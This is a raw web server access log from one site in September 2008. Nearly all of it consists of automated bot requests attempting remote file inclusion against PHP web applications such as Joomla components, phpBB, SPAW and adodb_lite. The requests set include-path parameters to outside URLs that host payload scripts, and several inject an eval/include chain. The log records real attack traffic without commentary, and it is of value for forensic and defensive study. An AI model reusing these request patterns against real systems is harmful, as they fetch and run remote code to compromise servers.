64.22.89.194 - - [12/Sep/2008:09:21:23 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
79.113.129.15 - - [12/Sep/2008:09:21:45 -0700] "GET /logs/access_080821.log HTTP/1.1" 200 3017907 "-" "hlRhwlwuy ikmitajfave" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:21:46 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:21:46 -0700] "GET /logs///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 64722 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:21:47 -0700] "GET ///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 89154 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:22:12 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:22:12 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:22:13 -0700] "GET /logs/access_080510.log/index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:22:14 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:22:15 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:22:17 -0700] "GET /logs/access_080510.log/index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:22:18 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:22:18 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.113.129.15 - - [12/Sep/2008:09:22:24 -0700] "GET /logs/access_080322.log HTTP/1.1" 200 2017433 "-" "emsfhaljdsaaoqroindm" "www.dmulk.com"
151.11.24.250 - - [12/Sep/2008:09:22:55 -0700] "GET /logs/access_080718.log//?include_path=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:22:59 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:23:00 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:23:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:23:01 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:23:12 -0700] "GET /logs/access_080824.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:23:16 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:23:16 -0700] "GET /logs///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 64722 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:23:17 -0700] "GET ///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 89138 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:09:23:24 -0700] "GET /logs/access_071129.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:23:39 -0700] "GET /logs/access_080824.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:23:45 -0700] "GET /logs/access_080331.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:23:46 -0700] "GET ///?_zb_path=http://www.jisu.ms.kr/data/mic.txt??? HTTP/1.1" 200 89094 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:24:01 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:24:01 -0700] "GET /logs/access_080819.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:24:09 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:24:10 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:24:22 -0700] "GET /tmp/?M=D HTTP/1.0" 200 3068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:24:24 -0700] "GET /logs/access_080820.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:09:24:36 -0700] "GET /logs/access_080331.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:24:39 -0700] "GET /logs/access_080820.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.86.78.18 - - [12/Sep/2008:09:24:41 -0700] "GET /logs/access_080727.log//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.86.78.18 - - [12/Sep/2008:09:24:45 -0700] "GET //hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.86.78.18 - - [12/Sep/2008:09:24:45 -0700] "GET /logs//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.86.78.18 - - [12/Sep/2008:09:24:45 -0700] "GET /logs/access_080726.log//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:25:08 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:25:09 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:09:25:13 -0700] "GET /logs/access_071228.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:25:23 -0700] "GET /logs/access_080830.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:25:23 -0700] "GET /logs/access_080830.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.248.246 - - [12/Sep/2008:09:25:26 -0700] "GET /logs/access_080807.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.248.246 - - [12/Sep/2008:09:25:26 -0700] "GET /logs/access_080825.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:25:27 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:25:30 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 200 89389 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.248.246 - - [12/Sep/2008:09:25:32 -0700] "GET /logs/access_080807.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.248.246 - - [12/Sep/2008:09:25:32 -0700] "GET /logs/access_080825.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:25:47 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.154.36 - - [12/Sep/2008:09:25:49 -0700] "GET /logs/access_080428.log HTTP/1.1" 200 3369449 "-" "nuilsRyfyhsytytxuetpbxh ffhjiyunrkdg" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:26:00 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:26:01 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89449 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.231.126 - - [12/Sep/2008:09:26:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.13.231.126 - - [12/Sep/2008:09:26:04 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.249.108.180 - - [12/Sep/2008:09:26:08 -0700] "GET /logs/access_080319.log/includes/setup.php?_SESSION%5Bdocroot_path%5D=http://acc-advertising.com/img/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [12/Sep/2008:09:26:08 -0700] "GET /includes/setup.php?_SESSION%5Bdocroot_path%5D=http://acc-advertising.com/img/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [12/Sep/2008:09:26:08 -0700] "GET /logs/access_080702.log/includes/setup.php?_SESSION%5Bdocroot_path%5D=http://acc-advertising.com/img/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [12/Sep/2008:09:26:09 -0700] "GET /logs/includes/setup.php?_SESSION%5Bdocroot_path%5D=http://acc-advertising.com/img/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:26:26 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jisu.ms.kr/data/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:26:45 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:26:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:26:46 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:26:46 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:26:57 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:26:57 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:27:12 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:27:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 200 89453 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:27:38 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:27:41 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 200 89389 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:27:55 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:27:55 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:27:55 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:28:13 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:28:13 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:28:13 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:28:13 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:28:17 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:28:17 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:28:18 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 200 89553 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:28:34 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:28:54 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:30:11 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:30:13 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.811" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:30:15 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:30:19 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:30:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:30:23 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:30:36 -0700] "GET /logs/access_080820.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:30:36 -0700] "GET /logs/access_080820.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:30:39 -0700] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:30:44 -0700] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:30:46 -0700] "GET /logs/access_080812.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:30:46 -0700] "GET /logs/access_080812.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [12/Sep/2008:09:31:16 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [12/Sep/2008:09:31:18 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89433 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:31:30 -0700] "GET /logs/access_080502.log//modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:31:38 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.241 - - [12/Sep/2008:09:31:43 -0700] "GET /logs/access_071129.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:32:01 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:32:04 -0700] "GET /logs/access_080715.log/include/Classes.inc.php?tm_includepath=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:32:06 -0700] "GET /logs/access_070705.log HTTP/1.0" 200 50888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.39 - - [12/Sep/2008:09:32:08 -0700] "GET /megumi/minamigrad2k8/IMG_1602.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:32:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:32:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:32:10 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:32:10 -0700] "GET /logs/access_071202.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:32:11 -0700] "GET /include/Classes.inc.php?tm_includepath=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:32:11 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:32:13 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
